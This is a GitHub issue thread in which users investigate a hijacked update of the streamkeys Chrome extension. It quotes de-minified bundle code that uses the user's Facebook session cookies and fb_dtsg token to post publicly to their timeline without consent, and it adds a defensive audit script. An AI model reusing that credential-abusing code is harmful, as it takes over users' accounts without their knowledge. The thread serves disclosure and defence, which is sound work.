
Transparency on today's update #1098

Open
bezo97 opened this issue Nov 21, 2023 · 27 comments

Comments

@bezo97

bezo97 commented Nov 21, 2023

Hi, today v1.8.5 of the extension has been published on the chrome store.
The changes are not reflected in the repo and it is asking for a bunch of extra permissions now:

  • Block content on any page
  • Display notifications

Can we get some transparency on why the extra permissions are needed, and possibly publish the updated code base?
Thanks in advance.

@karlhorky

karlhorky commented Nov 21, 2023

Would also like to see something about this 👍

Publisher on the extension page is notably not @berrberr but rather a "kara-benn" with email of [email protected]:

Screenshot 2023-11-21 at 16 28 28

@karlhorky

karlhorky commented Nov 21, 2023

Also:

  1. no new Git commits since June 2023 https://github.com/berrberr/streamkeys/commits/master
  2. version on GitHub is 1.8.4, whereas on the Chrome Extension page, it's 1.8.5

@karlhorky

karlhorky commented Nov 21, 2023

Source code of the installed extension is at the following path (macOS) if you want to check it out for yourself:

~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0

eg. open it in VS Code:

code "~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0"

The background.bundle.js is a bit interesting - it's a minified file, so it's hard to read, but interesting to see in the following code making some kind of requests to Facebook GraphQL API and facebook.com/friends (cannot find any references to facebook.com in the 1.8.4 extension code):

~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0/js/background.bundle.js

...fetch("https://www.facebook.com/api/graphql/",{credentials:"include",method:"post",body:this.fromHelper(n)}).then((function(t){return t.text()}...

...function(e){switch(e.label){case 0:return[4,k("https://www.facebook.com/friends",{credentials:"include",method:"get"}).text().catch((function(){return!1}))];case 1:return"boolean"==typeof(t=e.sent())?[2,!1]:[2,{fb_dtsg:this.checkData(this.reg_dtsg,t)...
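
The inspection described above can be scripted as a defender-side check (added example, not code from streamkeys or from anyone in this thread): diff the unpacked extension's manifest permissions against a known-good copy, and list hosts referenced from its JS bundles that are outside an allow-list. The directory layout mirrors the `1.8.4_0` / `1.8.5_0` paths above, but the manifests, permission names and bundle contents are constructed for illustration, not what 1.8.5 actually declares.

```python
"""Audit an unpacked Chrome extension against a known-good build.
Added example (not streamkeys code); sample manifests and bundles are constructed."""
import json
import os
import re
import tempfile

# Absolute http(s) URLs inside (minified) JS; group 1 is the host.
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')

def load_manifest(ext_dir):
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        return json.load(f)

def permission_diff(old_manifest, new_manifest):
    """Permissions declared by new but not by old. Unions 'permissions' and
    'host_permissions' so MV2 (hosts in 'permissions') and MV3 both work."""
    def perms(m):
        return set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    return sorted(perms(new_manifest) - perms(old_manifest))

def external_hosts(ext_dir, allowed):
    """Map each host referenced from .js files (excluding 'allowed') to the files."""
    found = {}
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                src = f.read()
            rel = os.path.relpath(path, ext_dir).replace(os.sep, "/")
            for host in sorted(set(URL_RE.findall(src))):
                if host not in allowed:
                    found.setdefault(host, []).append(rel)
    return found

def audit(old_dir, new_dir, allowed_hosts):
    """Compare two unpacked extension dirs (e.g. .../1.8.4_0 and .../1.8.5_0)."""
    return {
        "new_permissions": permission_diff(load_manifest(old_dir), load_manifest(new_dir)),
        "unexpected_hosts": external_hosts(new_dir, allowed_hosts),
    }

def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)

def build_sample():
    """Construct a good/suspect pair mimicking this thread's report and audit it."""
    base = tempfile.mkdtemp()
    old_dir, new_dir = os.path.join(base, "1.8.4_0"), os.path.join(base, "1.8.5_0")
    # Known-good manifest (constructed; permission names are illustrative only).
    _write(os.path.join(old_dir, "manifest.json"), json.dumps(
        {"name": "streamkeys", "version": "1.8.4", "permissions": ["tabs", "storage"]}))
    # Suspect manifest: extra API and host permissions, as the store update asked for.
    _write(os.path.join(new_dir, "manifest.json"), json.dumps(
        {"name": "streamkeys", "version": "1.8.5",
         "permissions": ["tabs", "storage", "notifications", "webRequestBlocking"],
         "host_permissions": ["<all_urls>"]}))
    # Constructed bundles: the old one only references a streaming site, the new one
    # also carries credentialed Facebook calls like those quoted in this thread.
    _write(os.path.join(old_dir, "js", "background.bundle.js"),
           'var u="https://www.youtube.com/";')
    _write(os.path.join(new_dir, "js", "background.bundle.js"),
           'var u="https://www.youtube.com/";'
           'fetch("https://www.facebook.com/api/graphql/",{credentials:"include",method:"post"});'
           'k("https://www.facebook.com/friends",{credentials:"include",method:"get"});')
    return audit(old_dir, new_dir, allowed_hosts={"www.youtube.com"})

if __name__ == "__main__":
    print(json.dumps(build_sample(), indent=2))
```

Pointing `audit()` at the real `1.8.4_0` build directory and the installed `1.8.5_0` directory gives the same two lists for the live extension.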

@bezo97
Author

bezo97 commented Nov 21, 2023

Definitely concerning. I'm keeping the extension disabled until the concerns are hopefully cleared, and I advise everyone to do so.

@raff-run

raff-run commented Nov 21, 2023

Comparing the versions, the word "fetch" wasn't used at all in the 1.8.4 code; 1.8.5 has at least 9 "fetch"s in the code.

Is this the nano issue all over again?

Highly agree to, at the very least, disable the extension until @berrberr explains himself.

Edit: looking at the code through an unminifier, all the fetch seems to be doing is... creating a facebook post to share streamkeys key bindings? Could be wrong though.

The fetch only seems to happen in response to this:
runtime.sendMessage({command:"action-share",data:f(f({},o),{content:c(!1)})},(function(e){e?alert("Share hotkey bindings success!")

Which triggers this bit which calls the function that does the fetch:

switch (a.label) {
                                    case 0:
                                        return "action-share" !== t.command ? [3, 2] : ((e = P().get(t, "data")), (r = e.fb_dtsg), (o = e.user_id), [4, new E(r, o).postToNewfeedGrapql(t.data.content)]);

The fetch's body. t is the text that gets appended to the request, which comes from the action-share action (presumably, the hotkeys themselves or some user-inputted text)

(n = {
                                        av: this.user_id,
                                        __user: this.user_id,
                                        __a: "1",
                                        __req: "2g",
                                        __hs: "19677.HYP:comet_pkg.2.1..2.1",
                                        dpr: "2",
                                        __ccg: "EXCELLENT",
                                        __rev: "1009868763",
                                        __s: "8ssa0r:ke81ci:fvhtfd",
                                        __hsi: "7301920436332870369",
                                        __dyn:
                                            "7AzHK4HzE4e5Q1ryaxG4VuC2-m1xDwAxu13wFwhUngS3q5UObwNwnof8boG0x8bo6u3y4o2Gwn82nwb-q7oc81xoswIK1Rwwwg8a8465o-cwfG12wOx62G5Usw9m1YwBgK7o884y0Mo4G1hx-3m1mzXw8W58jwGzE8FU5e7oqBwJK2W5olwUwOzEjUlDw-wUwxwjFovUy2a0SEuBwFKq2-azqwqo4i223908O3216xi4UdUcojxK2B0oobo8oC1hxB0qo4e16wWw-zXDw",
                                        __csr:
                                            "gbc9MF92G8wJ4lbfkZR6HW12Jh7fsBilREYihvfHXj8nZJqiYytYCOkCBnGC8GWVbhK9WEN9e9LXbiWSF8iJ6CBzyp994cBBqggojKnKunAJ2Afx1WypVp4ueByUFemFXgvGmdoCVo8XjKpxGieAAyEbbxyaWUaAdwGgGiudxjzomKmEkK8x268at0gEqBwIyEbKcxei1hK2a4oG4UizGxq3SiAvx-9y9oizpo-78W2uEqwKybyoK1gxm1Cg9E9of8yfwi8f9ax62m6VUhw-wk84WudxG1iz84-1sw9e2i221Igzo7RQ5E1hU24KdwXwvVU0yO14ta5U0Ux905pw3P80h4w0w2g0R-02ge00FXE0wm08MzE0Hy09xw4ry9o3jw2-E2Ywfm084c08owPo0s_w0B0BwIw1Qi0ku0bGw0D-o9U3kw1f60A87u0jK0s3w2cE5S0jUCmm290By9EHg",
                                        __comet_req: "15",
                                        fb_dtsg: this.fb_dtsg,
                                        jazoest: "25356",
                                        lsd: "LXzrokpeS5trhr-nPEy87V",
                                        __aaid: "0",
                                        __spin_r: "1009868763",
                                        __spin_b: "trunk",
                                        __spin_t: "1699934002",
                                        fb_api_caller_class: "RelayModern",
                                        fb_api_req_friendly_name: "ComposerStoryCreateMutation",
                                        variables: '{"input":{"composer_entry_point":"inline_composer","composer_source_surface":"timeline","idempotence_token":"'
                                            .concat(e, '_FEED","source":"WWW","attachments":[],"audience":{"privacy":{"allow":[],"base_state":"EVERYONE","deny":[],"tag_expansion_state":"UNSPECIFIED"}},"message":{"ranges":[],"text":"')
                                            .concat(t, '"},"with_tags_ids":[],"inline_activities":[],"explicit_place_id":"0","text_format_preset_id":"0","logging":{"composer_session_id":"')
                                            .concat(e, '"},"navigation_data":{"attribution_id_v2":"ProfileCometTimelineListViewRoot.react,comet.profile.timeline.list,via_cold_start,')
                                            .concat(Date.now(), ",")
                                            .concat(this.getScopeRandom(), ',190055527696468,"},"tracking":[null],"event_share_metadata":{"surface":"newsfeed"},"actor_id":"')
                                            .concat(
                                                this.user_id,
                                                '","client_mutation_id":"4"},"displayCommentsFeedbackContext":null,"displayCommentsContextEnableComment":null,"displayCommentsContextIsAdPreview":null,"displayCommentsContextIsAggregatedShare":null,"displayCommentsContextIsStorySet":null,"feedLocation":"TIMELINE","feedbackSource":0,"focusCommentID":null,"gridMediaWidth":230,"groupID":null,"scale":2,"privacySelectorRenderLocation":"COMET_STREAM","checkPhotosToReelsUpsellEligibility":true,"renderLocation":"timeline","useDefaultActor":false,"inviteShortLinkKey":null,"isFeed":false,"isFundraiser":false,"isFunFactPost":false,"isGroup":false,"isEvent":false,"isTimeline":true,"isSocialLearning":false,"isPageNewsFeed":false,"isProfileReviews":false,"isWorkSharedDraft":false,"UFI2CommentsProvider_commentsKey":"ProfileCometTimelineRoute","hashtag":null,"canUserManageOffers":false,"__relay_internal__pv__CometUFIIsRTAEnabledrelayprovider":false,"__relay_internal__pv__CometUFIReactionsEnableShortNamerelayprovider":false,"__relay_internal__pv__IsWorkUserrelayprovider":false,"__relay_internal__pv__IsMergQAPollsrelayprovider":false,"__relay_internal__pv__StoriesArmadilloReplyEnabledrelayprovider":false,"__relay_internal__pv__StoriesRingrelayprovider":true}'
                                            ),
                                        server_timestamps: "true",
                                        doc_id: "24042088335435161",
                                    }),
                                    [
                                        2,
                                        fetch("https://www.facebook.com/api/graphql/", { credentials: "include", method: "post", body: this.fromHelper(n) })

The fetch to /friends is probably just for the user to select whom to share it with.

Still, this lack of transparency is worrying, since the update seems to discourage the user from knowing what's changed (no more "see the source code at" in the description, minified/uglified code, no git repo change...)

@bezo97
Author

bezo97 commented Nov 21, 2023

After some digging I've found an archived version of 1.8.4 where the publisher is the now unavailable streamkeys.com and the description is almost the same except for the contact email. At this point I'm fairly convinced that it's been either hijacked or sold.

@DeMesmaekerIndra

DeMesmaekerIndra commented Nov 21, 2023

I managed to "share" my shortcuts with a facebook post when I went looking through the settings this evening as the extension stopped working for me.

Accidentally shared it to FB, but I was never prompted to log in or asked for confirmation to actually post a message on my feed. I even thought I had cancelled it by closing the pop-up; it wasn't until someone in the family notified me about the message that I knew it had happened.

I assume that's what the Facebook fetches in the earlier comments are about.

Immediately removed the extension 😦

@berrberr
Owner

Yeah, I transferred this extension on the Chrome store a while ago to someone who was supposed to do the updates for me because I didn't have time. Looks like it was transferred to someone else and clearly is spam now :(. I'm assuming it will be taken down from the Chrome store soon enough...

I would suggest everyone remove the Chrome store version and load their locally built versions if they want to keep using the extension. I'll keep the repo up so people can continue to do that.

@bezo97
Author

bezo97 commented Nov 21, 2023

Sad! Thanks for the clarification. I'm reporting it then.

@bezo97 bezo97 closed this as completed Nov 21, 2023
@karlhorky

karlhorky commented Nov 21, 2023

@berrberr thanks for the quick response! Hope the extension gets removed from the store soon.

Wonder how it ever passed review!

@prittjr

prittjr commented Nov 21, 2023

Can anyone help us non-engineers build and install 1.8.4 again?

@raff-run

raff-run commented Nov 21, 2023

@bezo97 Could you keep this issue open to give it more visibility? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

  1. Install Node.

  2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.

  3. Enter the folder you extracted.

  4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.

  5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
    image

  6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.

  7. Go into your browser and enter the "Extensions/Manage extensions" menu.

  8. Activate developer mode.

  9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.

  10. Done! The extension should now be available and show up as version 1.8.4.

  11. You should remove the 1.8.5 version while you're at it.

@quiin

quiin commented Nov 22, 2023

Now that the extension will probably be removed from the chromestore and it's just not very safe to use overall, does anybody know of an alternative?

@raff-run

This extension is safe to use, as long as you build it yourself. You can probably keep using it for a good while until it stops working on the site you use to stream.

I don't know an alternative, but I don't think one is needed (in the sense of an entire new thing): since it is open source, all the code is right here. All we need is someone with enough time to support it to fork this repo and publish a rebranded extension into the chrome web store.

@hababr

hababr commented Nov 23, 2023

@berrberr Probably it's better to remove the link to Chrome Store from the readme.

Anybody who thinks the extension should be removed can report it: https://chrome.google.com/webstore/report/ekpipjofdicppbepocohdlgenahaneen

@PieterD28

So, I'm not sure how it happened or what I did, but I removed the extension and, interestingly enough, now the buttons on my keyboard work (for YouTube) like they did before all this hoopla with this latest update started. Yay? (lol)

@max-collomb

Same for me for Deezer on Edge
Is there a new API that makes this extension unnecessary?

@prittjr

prittjr commented Nov 23, 2023

A year or two ago Chrome added a lot of this functionality natively, that's why it works for you. The added features in this extension are the ability to set a priority for each site, so I can, for example, pause Spotify with my media key while I'm on a YouTube tab. The native chrome feature just prioritizes the most recent media tab you visited, so it can sometimes be mysterious which tab you'll control anytime you press the button. None of that matters if you only have one media tab I guess, but I often have several open at once.

@abg88

abg88 commented Nov 28, 2023

So..... is it asking too much for a compiled crx file? I really like this extension and I miss using it, but this seems like a lot of steps for someone not so used to programming...

@hababr

hababr commented Nov 28, 2023

@abg88 Let me share the build, you need to enable 'Developer mode' on Extensions page and drag&drop folder 'Streamkeys_v1.8.4' from the archive.
Streamkeys_v1.8.4.zip

@kotylo

kotylo commented Nov 30, 2023

So, the manifest v2 warning that it will stop working in 2023 still applies? So this build-it-yourself fix will only last until they disable the manifest, right?

@xurpax

xurpax commented Dec 1, 2023

Awesome, thanks man! After doing this, is there any way to stop the version 1.8.4 from automatically upgrading to version 1.8.5?

@kotylo

kotylo commented Dec 1, 2023

It won't update automatically; you manage it yourself.

@hababr

hababr commented Dec 1, 2023

so, the manifest v2 warning that it will stop working in 2023 still applies? So this build-it-yourself fix will only last until they disable the manifest, right?

I expect it to work at least until June 2025. https://developer.chrome.com/docs/extensions/migrating/mv2-sunset/

@voed voed mentioned this issue Dec 7, 2023
@bsivanov

@abg88 Let me share the build, you need to enable 'Developer mode' on Extensions page and drag&drop folder 'Streamkeys_v1.8.4' from the archive. Streamkeys_v1.8.4.zip

Do repo owners think this deserved to be added as latest official release in Releases? /cc: @berrberr

@LukeVendro

I followed your tutorial and could install the extension, but now the media key to pause the video just doesn't work. Any idea why?

@Sargates

I was able to get it working by following this. Thanks for this.

I think it should be a top priority to get the original listing taken down to prevent whatever malicious purpose it serves now.
